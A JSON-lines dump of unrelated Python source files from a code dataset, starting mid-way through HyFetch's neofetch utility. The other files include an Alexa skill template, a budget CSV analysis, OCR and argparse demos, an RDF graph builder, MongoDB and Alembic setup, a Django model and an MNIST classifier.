Previously downloaded portable installation\n path = Path(__file__).parent / 'min_git'\n pkg_path = path / 'package.zip'\n if path.is_dir():\n return path / r'bin\\bash.exe'\n\n # No installation found, download a portable installation\n print('Git installation not found. Git is required to use HyFetch/neofetch on Windows')\n if literal_input('Would you like to install a minimal package for Git? (if no is selected colors almost certainly won\\'t work)', ['yes', 'no'], 'yes', False) == 'yes':\n print('Downloading a minimal portable package for Git...')\n from urllib.request import urlretrieve\n urlretrieve(MINGIT_URL, pkg_path)\n print('Download finished! Extracting...')\n with zipfile.ZipFile(pkg_path, 'r') as zip_ref:\n zip_ref.extractall(path)\n print('Done!')\n return path / r'bin\\bash.exe'\n else:\n sys.exit()\n\n\ndef check_windows_cmd():\n \"\"\"\n Check if this script is running under cmd.exe. If so, launch an external window with git bash\n since cmd doesn't support RGB colors.\n \"\"\"\n if IS_WINDOWS:\n import psutil\n # TODO: This line does not correctly identify cmd prompts...\n if psutil.Process(os.getppid()).name().lower().strip() == 'cmd.exe':\n print(\"cmd.exe doesn't support RGB colors, restarting in MinTTY...\")\n cmd = f'\"{ensure_git_bash().parent.parent / \"usr/bin/mintty.exe\"}\" -s 110,40 -e python -m hyfetch --ask-exit'\n os.system(cmd)\n sys.exit(0)\n\n\ndef run_neofetch_cmd(args: str, pipe: bool = False) -> str | None:\n \"\"\"\n Run neofetch command\n \"\"\"\n if platform.system() != 'Windows':\n full_cmd = ['/usr/bin/env', 'bash', get_command_path(), *shlex.split(args)]\n\n else:\n cmd = get_command_path().replace(\"\\\\\", \"/\").replace(\"C:/\", \"/c/\")\n args = args.replace('\\\\', '/').replace('C:/', '/c/')\n\n full_cmd = [ensure_git_bash(), '-c', f\"'{cmd}' {args}\"]\n # print(full_cmd)\n\n if pipe:\n return check_output(full_cmd).decode().strip()\n else:\n subprocess.run(full_cmd)\n\n\ndef get_distro_ascii(distro: str | None = None) -> str:\n \"\"\"\n Get the distro ascii of the current distro. 
Or if distro is specified, get the specific distro's\n ascii art instead.\n\n :return: Distro ascii\n \"\"\"\n if not distro and GLOBAL_CFG.override_distro:\n distro = GLOBAL_CFG.override_distro\n if GLOBAL_CFG.debug:\n print(distro)\n print(GLOBAL_CFG)\n\n # Try new pure-python detection method\n det = distro_detector.detect(distro or get_distro_name())\n if det is not None:\n return normalize_ascii(det.ascii)\n\n if GLOBAL_CFG.debug:\n printc(f\"&cError: Cannot find distro {distro}\")\n\n # Old detection method that calls neofetch\n cmd = 'print_ascii'\n if distro:\n cmd += f' --ascii_distro {distro}'\n\n asc = run_neofetch_cmd(cmd, True)\n\n # Unescape backslashes here because backslashes are escaped in neofetch for printf\n asc = asc.replace('\\\\\\\\', '\\\\')\n\n return normalize_ascii(asc)\n\n\ndef get_distro_name():\n return run_neofetch_cmd('ascii_distro_name', True)\n\n\ndef run(asc: str, backend: BackendLiteral, args: str = ''):\n if backend == \"neofetch\":\n return run_neofetch(asc, args)\n if backend == \"fastfetch\":\n return run_fastfetch(asc, args)\n if backend == \"fastfetch-old\":\n return run_fastfetch(asc, args, legacy=True)\n if backend == \"qwqfetch\":\n return run_qwqfetch(asc, args)\n\n\ndef run_qwqfetch(asc: str, args: str = ''):\n \"\"\"\n Run neofetch with colors\n\n :param preset: Color palette\n :param alignment: Color alignment settings\n \"\"\"\n asc = asc.replace('\\\\', '\\\\\\\\')\n\n # call qwqfetch to print string\n try:\n import qwqfetch\n # distro_detector only return a bash variable\n # so we use qwqfetch builtin distro detector\n print(qwqfetch.get_ascres(asc)) \n except ImportError as e: # module not found etc\n print(\"qwqfetch is not installed. Install it by executing:\") # use print to output hint directly\n print(\"pip install git+https://github.com/nexplorer-3e/qwqfetch\") # TODO: public repo\n raise e\n\ndef run_neofetch(asc: str, args: str = ''):\n \"\"\"\n Run neofetch with colors\n\n :param asc: Ascii art\n :param args: Additional arguments to pass to neofetch\n \"\"\"\n # Escape backslashes here because backslashes are escaped in neofetch for printf\n asc = asc.replace('\\\\', '\\\\\\\\')\n\n # Write temp file\n with TemporaryDirectory() as tmp_dir:\n tmp_dir = Path(tmp_dir)\n path = tmp_dir / 'ascii.txt'\n path.write_text(asc)\n\n # Call neofetch with the temp file\n if args:\n args = ' ' + args\n run_neofetch_cmd(f'--ascii --source {path.absolute()} --ascii-colors' + args)\n\n\ndef run_fastfetch(asc: str, args: str = '', legacy: bool = False):\n \"\"\"\n Run neofetch with colors\n\n :param asc: Ascii art\n :param args: Additional arguments to pass to fastfetch\n :param legacy: Set true when using fastfetch < 1.8.0\n \"\"\"\n # Write temp file\n with TemporaryDirectory() as tmp_dir:\n tmp_dir = Path(tmp_dir)\n path = tmp_dir / 'ascii.txt'\n path.write_text(asc)\n\n # Call fastfetch with the temp file\n proc = subprocess.run(['fastfetch', '--raw' if legacy else '--file-raw', path.absolute(), *shlex.split(args)])\n if proc.returncode == 144:\n printc(\"&6Error code 144 detected: Please upgrade fastfetch to >=1.8.0 or use the 'fastfetch-old' backend\")\n\n\ndef get_fore_back(distro: str | None = None) -> tuple[int, int] | None:\n \"\"\"\n Get recommended foreground-background configuration for distro, or None if the distro ascii is\n not suitable for fore-back configuration.\n\n :return:\n \"\"\"\n if not distro and GLOBAL_CFG.override_distro:\n distro = GLOBAL_CFG.override_distro\n if not distro:\n distro = get_distro_name().lower()\n 
distro = distro.lower().replace(' ', '-')\n for k, v in fore_back.items():\n if distro.startswith(k.lower()):\n return v\n return None\n\n\n# Foreground-background recommendation\nfore_back = {\n 'fedora': (2, 1),\n 'kubuntu': (2, 1),\n 'lubuntu': (2, 1),\n 'xubuntu': (2, 1),\n 'ubuntu-cinnamon': (2, 1),\n 'ubuntu-kylin': (2, 1),\n 'ubuntu-mate': (2, 1),\n 'ubuntu-studio': (2, 1),\n 'ubuntu-sway': (2, 1),\n}\n\n","sub_path":"hyfetch/neofetch_util.py","file_name":"neofetch_util.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"543958548","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport ask_sdk_core.utils as ask_utils\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"This is the opening remark when your app is called\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass exampleHandler(AbstractRequestHandler):\n \"\"\"Handler for example Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"exampleIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"This is an example of a custom intent. 
Your intent name should match the intent name listed on line 44, which is exampleIntent\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"verbiage for help\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass HomeIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Home Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.NavigateHomeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"verbiage for Home\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"final message when user leaves\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = \"You just triggered \" + intent_name + \".\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speak_output = \"Sorry, I had trouble doing what you asked. 
Please try again.\"\n\n        return (\n            handler_input.response_builder\n                .speak(speak_output)\n                .ask(speak_output)\n                .response\n        )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(exampleHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(HomeIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\nsb.add_request_handler(IntentReflectorHandler()) # make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nlambda_handler = sb.lambda_handler()\n","sub_path":"simple-phtyon.py","file_name":"simple-phtyon.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"8226868","text":"# Import modules\nimport csv\nimport os\n\n# Set path\npy_bank_data = os.path.join(\"../PyBank\", \"budget_data.csv\")\n\n# Lists for storing data\nprofit = []\nmonthly_changes = []\ndate = []\n\n# Create variables\nmonth_count = 0\ntotal_profit = 0\ntotal_change_profit = 0\ninitial_profit = 0\n\n# Open CSV\nwith open(py_bank_data, newline=\"\") as csvfile:\n    csvreader = csv.reader(csvfile, delimiter=\",\")\n    csv_header = next(csvreader)\n\n    for row in csvreader:\n        # Append lists while going through the data\n        month_count = month_count + 1\n        date.append(row[0])\n        profit.append(row[1])\n\n        # Adding new profit to previous total profit\n        total_profit = total_profit + int(row[1])\n        final_profit = int(row[1])\n\n        # Find the change in profit per month\n        monthly_changes_profits = final_profit - initial_profit\n        monthly_changes.append(monthly_changes_profits)\n\n        # Change final profit to initial profit for next row calculation\n        initial_profit = final_profit\n\n        # Adding all changing profits for average\n        total_change_profit = total_change_profit + monthly_changes_profits\n\n    # Average change over the given period\n    average_change_profits = (total_change_profit/month_count)\n\n    # Find the largest increase and decrease in profit per month\n    greatest_increase_profits = max(monthly_changes)\n    greatest_decrease_profits = min(monthly_changes)\n\n    increase_date = date[monthly_changes.index(greatest_increase_profits)]\n    decrease_date = date[monthly_changes.index(greatest_decrease_profits)]\n\n    # Print output in GitBash\n    print(\"Financial Analysis\")\n    print(\"----------------------------------------------------------\")\n    print(\"Total Months: \" + str(month_count))\n    print(\"Total Profits: \" + \"$\" + str(total_profit))\n    print(\"Average Change: \" + \"$\" + str(int(average_change_profits)))\n    print(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase_profits) + \")\")\n    print(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease_profits) + \")\")\n    print(\"----------------------------------------------------------\")\n\n    # Send to txt file\n    with open(\"bank_data_output.txt\", \"w\") as text:\n        text.write(\"Financial Analysis\" + \"\\n\")\n        text.write(\"----------------------------------------------------------\\n\")\n        text.write(\"Total Months: \" + str(month_count) 
+ \"\\n\")\n        text.write(\"Total Profits: \" + \"$\" + str(total_profit) + \"\\n\")\n        text.write(\"Average Change: \" + \"$\" + str(int(average_change_profits)) + \"\\n\")\n        text.write(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase_profits) + \")\" + \"\\n\")\n        text.write(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease_profits) + \")\" + \"\\n\")\n        text.write(\"----------------------------------------------------------\\n\")","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"241287994","text":"import pyocr\nimport pyocr.builders\nimport cv2\nimport sys\nfrom PIL import Image\n\ndef get_word_box(src_file_path):\n    tools = pyocr.get_available_tools()\n    if len( tools ) == 0:\n        print(\"No OCR tool found\")\n        sys.exit(1)\n    tool = tools[0]\n    res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.WordBoxBuilder(tesseract_layout=1))\n    #res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.TextBuilder(tesseract_layout=6))\n    #res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.BaseBuilder())\n    print( res )\n    return res\n\nif __name__ == \"__main__\":\n    src_file_path = \"../image/fe/h21a/h21a03.png\"\n    res = get_word_box(src_file_path)\n    out = cv2.imread(src_file_path)\n    for d in res:\n        print( d.content )\n        print( d.position )\n        cv2.rectangle(out,d.position[0],d.position[1],(0,0,255),2)\n\n    cv2.imshow('image',out)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n","sub_path":"lib/ocr_lib/word_box_mj.py","file_name":"word_box_mj.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"220030752","text":"import argparse  # 1. import the module\r\n\r\ndef read_args():\r\n    parser = argparse.ArgumentParser()  # 2. create 'parser', the box that stores the arguments\r\n\r\n    # 3. configure which arguments are accepted (one line = one argument)\r\n    parser.add_argument('--list')  # the simplest form\r\n\r\n    parser.add_argument('--in_dir', required=True)  # must always be specified\r\n\r\n    parser.add_argument('--mode', choices=['train', 'test', 'cont', 'seq'], required=True)  # only one of the listed choices is accepted\r\n\r\n    parser.add_argument('--chtbl', default='etc/ch_merge.dat')  # the default value is filled in when not specified\r\n\r\n    parser.add_argument('--filter', action='store_true')  # a value-less flag; returns True when the option is passed\r\n\r\n    parser.add_argument('--rottbl', default='etc/ch_rot.dat', help='rotation table')  # help text can be set too; printed with -h or --help\r\n\r\n    parser.add_argument('--overlap', type=int, default=0)  # specify the type (format) used when the value is read\r\n\r\n    tp1 = lambda x:list(map(str, x.split('-')))  # you can also define your own type\r\n    parser.add_argument('--term', type=tp1, default=['20210910', '20210911'], help='format: yymmdd-yymmdd term for conversion')\r\n\r\n    args = parser.parse_args()  # 4. receive the arguments exactly as configured above\r\n\r\n    # cf. https://qiita.com/kzkadc/items/e4fc7bc9c003de1eb6d0\r\n\r\n    return args\r\n\r\ndef main(args):\r\n    print(args)\r\n    #print(args.list)  # when you want to pull out a specific argument\r\n\r\n    #args.add = 'hoge'  # attributes can also be added later\r\n    #print(args)\r\n\r\n    #args.list = 'hoge2.txt'  # and can be updated too\r\n    #print(args.list)\r\n\r\nif __name__ == '__main__':\r\n    args = read_args()\r\n    main(args)","sub_path":"try_argparse.py","file_name":"try_argparse.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"216795714","text":"from rdflib import URIRef, BNode, Literal\nfrom rdflib.namespace import RDF, FOAF \nimport rdflib\nfrom rdflib import Graph\nimport pprint\n\nimport os,glob\n# os.chdir(\"/home/z003z47y/Projects/Government/ASKE/2019/092219_output/\")\n# for file in glob.glob(\"*.txt\"):\n#     print(file)\nimage2graphs = []\noutputList = set()\nontology = \"/home/z003z47y/git/DCC/src/ontology/DeepSciKG.nt\"\ndestinationfolder = \"/home/z003z47y/git/DCC/src/ontology/rdf/image2graph/\"\nfor root, dirs, files in os.walk(\"/home/z003z47y/Projects/Government/ASKE/2019/092219_output/\"):\n    for file in files:\n        if file.endswith('.txt'):\n            # print(os.path.join(root, file))\n            image2graphs.append(os.path.join(root, file))\n\n\nconsolidatedGraph = Graph() \nconsolidatedGraph.parse(ontology,format=\"n3\")\n\ndef createPredicateSet(inputfile):\n    with open(inputfile,encoding=\"ISO-8859-1\") as f:\n        lines = f.readlines()\n    predicateLines = [x.strip() for x in lines]\n    for line in predicateLines:\n        triple = line.split(\" \")\n        subject = triple[0]\n        predicate = triple[1]\n        if(triple[2] is None):\n            obj = \"\"\n        else:\n            obj = triple[2]\n        # obj = triple[2]\n        # print(\"obj is \" + obj)\n        if(predicate==\"isType\"):\n            outputList.add(obj)\n    print(outputList)\n\n\n# for file in image2graphs:\n#     print(file + \"\\n\")\n#     createPredicateSet(file)\n# print(outputList)\n# print(len(outputList))\ndef createimage2graph(inputfile,ontology,destinationfolder):\n\n    g = Graph()\n    g.parse(ontology,format=\"n3\")\n    # len(g)\n\n    block_dict = {\n        \"Figure\":\"Figure\",\n        \"conv\": \"ConvBlock\",\n        \"deconv\":\"DeconvBlock\",\n        \"dense\":\"DenseBlock\",\n        \"flatten\":\"FlattenBlock\",\n        \"dropout\":\"DropoutBlock\",\n        \"pooling\":\"PoolingBlock\",\n        \"unpooling\":\"UnpoolingBlock\",\n        \"concat\":\"ConcatBlock\",\n        \"rnn\":\"RnnBlock\",\n        \"rnnseq\": \"RnnSeqBlock\",\n        \"lstm\":\"LSTMBlock\",\n        \"lstmseq\":\"LSTMSeqBlock\",\n        \"norm\":\"NormBlock\",\n        \"embed\":\"EmbedBlock\",\n        \"activation\":\"ActivationBlock\",\n        \"loss\":\"LossBlock\",\n        \"output\":\"OutputBlock\",\n        \"input\":\"InputBlock\"\n    }\n\n# Namespaces\n    dcc_namespace = \"https://github.com/deepcurator/DCC/\"\n\n    # Classes\n    Figure = URIRef(dcc_namespace + \"Figure\")\n    # ActivationBlock = URIRef(dcc_namespace + \"ActivationBlock\")\n    # EmbedBlock = URIRef(dcc_namespace + \"EmbedBlock\")\n    # NormBlock = URIRef(dcc_namespace + \"NormBlock\")\n    # LSTMSeqBlock = URIRef(dcc_namespace + \"LSTMSeqBlock\")\n    # LSTMBlock = URIRef(dcc_namespace + \"LSTMBlock\")\n    # RNNSeqBlock = URIRef(dcc_namespace + \"RNNSeqBlock\")\n    # RNNBlock = URIRef(dcc_namespace + \"RNNBlock\")\n    # ConcatBlock = URIRef(dcc_namespace + \"ConcatBlock\")\n    # UnpoolingBlock = URIRef(dcc_namespace + \"UnpoolingBlock\")\n    # PoolingBlock = URIRef(dcc_namespace + \"PoolingBlock\")\n    # DropoutBlock = URIRef(dcc_namespace + \"DropoutBlock\")\n    # FlattenBlock = URIRef(dcc_namespace + \"FlattenBlock\")\n    # DenseBlock = URIRef(dcc_namespace + \"DenseBlock\")\n    # DeconvBlock = 
URIRef(dcc_namespace + \"DeconvBlock\")\n # ConvBlock = URIRef(dcc_namespace + \"ConvBlock\")\n # LossBlock = URIRef(dcc_namespace + \"LossBlock\")\n # Properties\n partOf = URIRef(dcc_namespace + \"partOf\")\n followedBy = URIRef(dcc_namespace + \"followedBy\")\n\n # Open the image2graph\n\n with open(inputfile,encoding=\"ISO-8859-1\") as f:\n lines = f.readlines()\n lines = [x.strip() for x in lines]\n\n # Each line in the image2graph is a triple\n # Split the triple into s,p,o\n # Create the URIRefs for RDF based on the ontology\n # URIRefs require the namespace and the class term from ontology\n\n for line in lines:\n triple = line.split(\" \")\n subject = triple[0]\n predicate = triple[1]\n obj = triple[2]\n # print(line + \"\\n\")\n if(predicate == \"partOf\"):\n ## Subject is a component\n ## Create a unique URI for that\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n subject = URIRef(dcc_namespace + filename[4:] + \"_\" + subject[1:])\n obj = URIRef(dcc_namespace + obj)\n g.add((subject,partOf,obj))\n consolidatedGraph.add((subject,partOf,obj))\n elif(predicate == \"isA\"):\n subject = URIRef(dcc_namespace + subject)\n g.add((subject,RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n consolidatedGraph.add((subject,RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n elif(predicate == \"isType\"):\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n subject = URIRef(dcc_namespace + filename[4:] + \"_\" + subject[1:])\n g.add((subject, RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n consolidatedGraph.add((subject, RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n\n # All triples are created for the current file\n # Serialize the rdf files to their right folder\n\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n print(destinationfolder + filename[4:])\n destinationfile = destinationfolder + filename[4:] + \".ttl\"\n print(\"Saving rdf graph \" + destinationfile + \"\\n\")\n g.serialize(destination=destinationfile,format='turtle')\n\n# print(image2graphs)\nfor file in image2graphs:\n filename = file.split('/')[-1]\n filename = filename.split('.txt')[0]\n print(\"Creating RDF graph for \" + filename[4:])\n createimage2graph(file,ontology,destinationfolder)\n\nconsolidatedGraph.serialize(destination=\"image2graph.ttl\",format='turtle')","sub_path":"src/ontology/image2rdf.py","file_name":"image2rdf.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255842995","text":"from pymongo import MongoClient\nimport os\nimport json\n\nfrom settings import COMPANIES_JSON_PATH, PEOPLE_JSON_PATH, DB_NAME, HOST_NAME, PORT_NAME, \\\n COMPANIES_COLLECTION_NAME, PEOPLE_COLLECTION_NAME, \\\n FRUIT_LIST, VEG_LIST, \\\n PEOPLE_FAVORITE_FOOD_COLNAME, PEOPLE_FAVORITE_FRUIT_COLNAME, PEOPLE_FAVORITE_VEGETABLE_COLNAME\n\n\n\ndef get_fruits(foods):\n return [food for food in foods if food in FRUIT_LIST]\n\n\ndef get_veg(foods):\n return [food for food in foods if food in VEG_LIST]\n\n\ndef init_collection(db, collection_name, collection_json_path):\n if db[collection_name]:\n db[collection_name].drop()\n\n with open(collection_json_path, 'r') as f:\n collection_json = json.load(f)\n\n collection = db[collection_name]\n print(\"Loading data into the mongodb.collection: {}.{}\".format(db.name, collection_name))\n collection.insert_many(collection_json)\n\n\ndef process_food(collection_people):\n for 
person in collection_people.find():\n fruits = get_fruits(person[PEOPLE_FAVORITE_FOOD_COLNAME])\n vegs = get_veg(person[PEOPLE_FAVORITE_FOOD_COLNAME])\n collection_people.update_one({\"_id\": person[\"_id\"]}, {\"$set\": {PEOPLE_FAVORITE_FRUIT_COLNAME: fruits}})\n collection_people.update_one({\"_id\": person[\"_id\"]}, {\"$set\": {PEOPLE_FAVORITE_VEGETABLE_COLNAME: vegs}})\n\n\ndef load_data_to_mongo(db_name=DB_NAME,\n host_name=HOST_NAME,\n port_name=PORT_NAME,\n companies_collection_name=COMPANIES_COLLECTION_NAME,\n companies_json_path=COMPANIES_JSON_PATH,\n people_collection_name=PEOPLE_COLLECTION_NAME,\n people_json_path=PEOPLE_JSON_PATH):\n\n client = MongoClient(host_name, port_name)\n db = client[db_name]\n\n init_collection(db, companies_collection_name, companies_json_path)\n init_collection(db, people_collection_name, people_json_path)\n\n process_food(db[people_collection_name])","sub_path":"setup/mongo_init.py","file_name":"mongo_init.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"362346061","text":"\"\"\"add server\n\nRevision ID: 4cb042fe9e64\nRevises: 3f93484822f7\nCreate Date: 2015-12-08 15:02:20.891740\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4cb042fe9e64'\ndown_revision = '3f93484822f7'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('servers',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ip', sa.String(length=50), nullable=False),\n sa.Column('ssh_port', sa.Integer(), nullable=False),\n sa.Column('servername', sa.String(length=50), nullable=True),\n sa.Column('is_open', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('ip')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('servers')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/4cb042fe9e64_add_server.py","file_name":"4cb042fe9e64_add_server.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220547458","text":"#listing_id,business_name,listing_description,owner_id\n#listing_location,listing_longitude,listing_latitude,category_id\n#host_highlight,additional_info,created_date,modified_date\n#featured,is_active\n\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom .address import Address\nfrom .listing import Listing\nfrom .business_connection import BConnection\n\n\nclass Perk(models.Model):\n owner = models.ForeignKey(to=User)\n from_listing = models.ForeignKey(to=Listing) # perk offered from\n ally = models.ForeignKey(to=Listing,null=True, blank=True, related_name='+') #perk offered to\n perk_name = models.CharField(max_length=100)\n perk_description = models.CharField(max_length=200)\n perk_coupon_code = models.CharField(max_length=7)\n is_active = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n perk_image_url = models.CharField(max_length=200)\n additional_info = models.CharField(max_length=500)\n\n","sub_path":"logaloud/mobilebackend/models/perk.py","file_name":"perk.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"651309784","text":"# -*- coding: utf-8 -*-#\n'''\n# Name: mnistTest\n# Description: \n# Author: super\n# Date: 2019-08-06\n'''\n\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import SGDClassifier\n\ndef get_mnist_data():\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n X_train = X_train.reshape(X_train.shape[0], -1) / 255\n X_test = X_test.reshape(X_test.shape[0], -1) / 255\n return (X_train, y_train), (X_test, y_test)\n\ndef plt_mnist():\n some_digit = X_train[3970]\n print(y_train[3970])\n plt.imshow(X_train[3970], interpolation=\"nearest\")\n plt.axis(\"off\")\n plt.show()\n\nif __name__ == \"__main__\":\n (X_train, y_train), (X_test, y_test) = get_mnist_data()\n # plt_mnist()\n sgd_clf = SGDClassifier(random_state=42)\n sgd_clf.fit(X_train, y_train)\n print(sgd_clf.predict(X_test[:10]))\n print(y_test[:10])","sub_path":"Machine learning practice/classification-practice/mnistTest.py","file_name":"mnistTest.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117930308","text":"##\n## Por cada clave de la columna 5 (cadena de tres letras), obtenga\n## el valor mas pequeño y el valor mas grande asociado a esa clave.\n##\n## aaa,0,6\n## bbb,4,7\n## ccc,0,1\n## ddd,5,5\n## eee,0,0\n## fff,4,9\n## ggg,3,3\n## hhh,6,8\n## iii,2,7\n## jjj,2,5\n##\n\n\n'''\n\naaa,0,9\nbbb,0,9\nccc,0,9\nddd,0,9\neee,0,7\nfff,0,9\nggg,0,9\nhhh,0,9\niii,0,9\njjj,0,9\n\n'''\n\n\nfrom libM import generateMatrix\n\nt = []\n\nfor row in generateMatrix():\n t.extend(row[4].split(','))\n\nd = {}\nh = []\nfor element in t:\n l, n = element.split(':')\n if l in d:\n d[l] += str(' '+n)\n else:\n d[l] = str(n)\n h.append(l)\n\nfor i in sorted(h):\n print(i, min(d[i].split(' ')), max(d[i].split(' ')), 
